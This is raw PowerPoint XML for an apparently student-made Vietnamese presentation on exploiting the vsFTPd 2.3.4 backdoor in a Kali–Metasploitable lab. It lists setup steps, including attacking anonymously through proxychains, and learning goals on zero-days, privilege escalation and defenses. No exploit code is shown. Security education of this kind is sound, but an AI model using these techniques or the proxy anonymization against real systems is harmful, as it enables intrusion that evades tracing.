            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhiều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thứ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nữa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3198511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EABA3E-0D65-4795-AF7E-A507B5934984}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="226829"/>
            <a:ext cx="8596668" cy="5814534"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Lâm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MSV: 75DCTT11238</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nguồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Khảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thuật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Kevin Mitnick –</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bóng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mạng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website: Whitehat.vn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Website: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>AnonyViet.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3279221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EF87E-7399-4D2A-843D-860CB7B0D84E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Nghiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cứu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vsFTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.3.4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF5683B-159A-4112-9097-5E2040EA4675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2459665"/>
            <a:ext cx="8596668" cy="3581697"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thứ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chuẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bị</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhiên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rồi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vitualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chạy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ảo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Máy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ẩn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>danh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qua proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mở</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proxychains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3377514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357A3-13CC-4297-9F83-CE43DF0C5B68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mục</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tiêu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D6A90D2-95DD-4F23-9BBB-6397EAE3772D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>khai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</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tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zeroday</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zeroday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tại</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiểu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>leo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> thang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đó</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rút</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>biện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phòng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cũng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kinh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
